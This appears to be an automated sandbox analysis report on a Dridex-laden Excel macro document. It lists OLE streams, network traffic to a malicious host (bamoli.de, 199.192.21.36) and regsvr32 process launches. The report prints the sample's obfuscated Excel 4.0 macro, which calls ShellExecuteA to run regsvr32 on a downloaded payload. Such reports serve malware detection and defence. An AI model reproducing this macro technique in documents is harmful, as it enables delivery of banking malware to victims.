Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . p . . k . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 70 fe 1e 6b 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
"Questa_cartella_di_lavoro" |
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 564 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 564 |
Entropy: | 5.25985243733 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 0 5 6 6 E 4 0 1 - 8 0 6 F - 4 7 1 6 - B 6 4 7 - E 0 B 8 5 9 A 4 D 5 7 D } " . . D o c u m e n t = Q u e s t a _ c a r t e l l a _ d i _ l a v o r o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l o 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 8 D A 6 F 9 5 7 3 9 5 7 3 9 5 7 3 9 5 7 3 " . . D P B = " B 0 B 2 0 7 6 8 0 8 6 8 0 |
Data Raw: | 49 44 3d 22 7b 30 35 36 36 45 34 30 31 2d 38 30 36 46 2d 34 37 31 36 2d 42 36 34 37 2d 45 30 42 38 35 39 41 34 44 35 37 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d |
Stream Path: PROJECTwm, File Type: data, Stream Size: 128 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 128 |
Entropy: | 3.34420769179 |
Base64 Encoded: | False |
Data ASCII: | Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . Q . u . e . s . t . a . _ . c . a . r . t . e . l . l . a . _ . d . i . _ . l . a . v . o . r . o . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . M o d u l o 1 . M . o . d . u . l . o . 1 . . . . . |
Data Raw: | 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 00 51 00 75 00 65 00 73 00 74 00 61 00 5f 00 63 00 61 00 72 00 74 00 65 00 6c 00 6c 00 61 00 5f 00 64 00 69 00 5f 00 6c 00 61 00 76 00 6f 00 72 00 6f 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 4d 6f 64 75 6c 6f 31 00 4d 00 6f 00 64 00 75 00 6c 00 6f 00 31 00 00 00 00 00 |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3535 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 3535 |
Entropy: | 4.33045908783 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
Data Raw: | cc 61 b2 00 00 03 00 ff 10 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: VBA/dir, File Type: data, Stream Size: 847 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 847 |
Entropy: | 6.50704839241 |
Base64 Encoded: | True |
Data ASCII: | . K . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . H . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 4b b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 48 c3 aa 61 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Macro 4.0 Code |
---|
CALL("Sh"&U&"ll32", "Sh"&U&"llEx"&U&"cut"&U&"A", "JJCCCCJ", y, "Op"&U&"n", "r"&U&"gsvr32", " -"&if&" "&B&D&F, y, y)
"=CALL(""Sh""&U&""ll32"",""Sh""&U&""llEx""&U&""cut""&U&""A"", ""JJCCCCJ"",y,""Op""&U&""n"",""r""&U&""gsvr32"","" -""&if&"" ""&B&D&F,y,y)"=RETURN()
OLE File "/opt/package/joesandbox/database/analysis/344478/sample/Dridex-06-bc1b.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | False |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-11-24T09:53:01Z |
Last Saved Time: | 2020-11-24T11:16:24Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 112 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 112 |
Entropy: | 4.6011544911 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . n ` . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 F r a m e . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F r a m e . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 20 18 6e 60 f4 ce 11 9b cd 00 aa 00 60 8e 01 1a 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 72 61 6d 65 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0e 00 00 00 46 6f 72 6d 73 2e 46 72 61 6d 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: f, File Type: data, Stream Size: 54 |
---|
General | |
---|---|
Stream Path: | f |
File Type: | data |
Stream Size: | 54 |
Entropy: | 1.81172045559 |
Base64 Encoded: | False |
Data ASCII: | . . ( . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 04 28 00 06 0c 06 08 0e 00 00 80 0e 00 00 80 03 00 00 00 0e 00 00 80 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Data ASCII: | |
Data Raw: |
Macro 4.0 Code |
---|
CALL("Sh"&U&"ll32", "Sh"&U&"llEx"&U&"cut"&U&"A", "JJCCCCJ", y, "Op"&U&"n", "r"&U&"gsvr32", " -"&if&" "&B&D&F, y, y)
"=CALL(""Sh""&U&""ll32"",""Sh""&U&""llEx""&U&""cut""&U&""A"", ""JJCCCCJ"",y,""Op""&U&""n"",""r""&U&""gsvr32"","" -""&if&"" ""&B&D&F,y,y)"=RETURN()
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 26, 2021 16:16:52.647237062 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:53.031683922 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:53.031779051 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:53.040821075 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:53.436954021 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:53.438813925 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:53.438882113 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:53.439016104 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:53.439035892 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:53.439099073 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:53.439116001 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:53.454781055 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:53.833894014 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:53.833924055 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:53.834187984 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:55.394364119 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:55.774748087 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.779407978 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.779485941 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.779527903 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.779566050 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.779604912 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.779633045 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:55.779691935 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:55.780330896 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.780371904 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.780411959 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.780435085 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:55.780463934 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:55.780538082 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.780575037 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:16:55.780606031 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:16:55.780636072 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:18:00.778804064 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:18:00.778858900 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:18:00.778913975 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:18:00.778965950 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:18:51.458421946 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:18:51.458503962 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
Jan 26, 2021 16:18:51.839639902 CET | 443 | 49167 | 199.192.21.36 | 192.168.2.22 |
Jan 26, 2021 16:18:51.839720964 CET | 49167 | 443 | 192.168.2.22 | 199.192.21.36 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 26, 2021 16:16:52.568312883 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 26, 2021 16:16:52.629705906 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Jan 26, 2021 16:16:54.171509981 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 26, 2021 16:16:54.221276999 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Jan 26, 2021 16:16:54.235192060 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 26, 2021 16:16:54.282988071 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Jan 26, 2021 16:16:54.821381092 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 26, 2021 16:16:54.878948927 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Jan 26, 2021 16:16:54.891345978 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 26, 2021 16:16:54.941071987 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 26, 2021 16:16:52.568312883 CET | 192.168.2.22 | 8.8.8.8 | 0xccae | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 26, 2021 16:16:52.629705906 CET | 8.8.8.8 | 192.168.2.22 | 0xccae | No error (0) | 199.192.21.36 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jan 26, 2021 16:16:53.438882113 CET | 199.192.21.36 | 443 | 192.168.2.22 | 49167 | CN=bamoli.de CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US | CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Sat Nov 28 07:26:47 CET 2020 Thu Mar 17 17:40:46 CET 2016 | Fri Feb 26 07:26:47 CET 2021 Wed Mar 17 17:40:46 CET 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b |
CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Thu Mar 17 17:40:46 CET 2016 | Wed Mar 17 17:40:46 CET 2021 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 16:16:40 |
Start date: | 26/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13fcb0000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:16:49 |
Start date: | 26/01/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffbb0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:16:49 |
Start date: | 26/01/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffbb0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:16:50 |
Start date: | 26/01/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffbb0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: Foglio1 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Foglio1" |
2 | Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = True |
9 | Attribute VB_Control = "pagoUno, 10, 0, MSForms, Frame" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Cells | |
Cells | |
SpecialCells | |
xlCellTypeConstants | |
Len | Len( |